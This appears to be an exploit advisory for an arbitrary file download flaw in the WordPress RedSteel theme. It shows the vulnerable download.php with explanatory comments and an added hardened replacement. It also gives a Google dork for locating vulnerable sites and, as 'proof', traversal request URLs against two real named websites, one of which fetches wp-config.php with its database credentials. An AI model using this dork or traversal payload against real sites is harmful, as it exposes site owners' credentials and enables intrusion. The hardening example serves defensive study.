[*] Exploit Title: WordPress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By: ACC3SS
Location:
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php
Vulnerable code file: download.php
<?php
// The "file" parameter is taken straight from the query string and is never
// validated: it may contain "../" segments or an absolute path.
$file = @$_GET['file'];
// Only the last path segment is used for the download file name; the full
// user-supplied path is still what gets opened below.
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
// file_exists() accepts any readable path on the server, so this check does
// not confine the request to the theme directory.
if ((isset($file))&&(file_exists($file))) {
// Later header() calls replace the earlier ones with the same name, so the
// response ends up as application/octet-stream with an attachment disposition.
header("Content-type: application/force-download");
header('Content-Disposition: inline; filename="' . $fileName . '"');
header("Content-Transfer-Encoding: Binary");
header("Content-length: ".filesize($file));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $fileName . '"');
// The unvalidated path is read and sent to the client verbatim.
readfile($file);
}
?>
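For comparison, the following is a hardened replacement for the script above. It is an added example, not the vendor's code and not a patch the theme ships: it assumes a fixed downloads directory (RedSteel/downloads, an assumed name) and an assumed allow-list of extensions, accepts only a bare file name rather than a path, and verifies with realpath() that the resolved file really lives inside that directory before serving it.

```php
<?php
// Hardened download.php (added example, not the theme's own code).
// Assumption: downloadable files live in a "downloads" directory next to this script.
$baseDir = realpath(__DIR__ . DIRECTORY_SEPARATOR . 'downloads');
$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';

// The request may name a file, never a path: reject directory separators,
// the "." and ".." entries, NUL bytes and an empty name. basename() strips
// both "/" and "\" separators, so comparing against it catches either form.
if ($requested === '' || $requested === '.' || $requested === '..'
    || $requested !== basename($requested) || strpos($requested, "\0") !== false) {
    http_response_code(400);
    exit('Bad request');
}

// realpath() resolves symlinks and ".." segments, so a prefix check against the
// resolved base directory guarantees the target is inside it (or returns false).
$target = ($baseDir !== false) ? realpath($baseDir . DIRECTORY_SEPARATOR . $requested) : false;

if ($baseDir === false || $target === false || !is_file($target)
    || strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit('Not found');
}

// Assumed allow-list: even inside the directory, never serve PHP source or config files.
$allowedExt = ['zip', 'pdf', 'png', 'jpg'];
$ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    http_response_code(403);
    exit('Forbidden');
}

// Set each header once; use the resolved file name, not the raw parameter.
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($target));
header('Content-Disposition: attachment; filename="' . basename($target) . '"');
readfile($target);
```

With this version a request such as download.php?file=../../../wp-config.php fails the basename() check and receives a 400, while download.php?file=download.php passes the name check but is rejected by the extension allow-list with a 403; only files that exist inside the downloads directory and carry an allowed extension are sent.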
Proof:
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php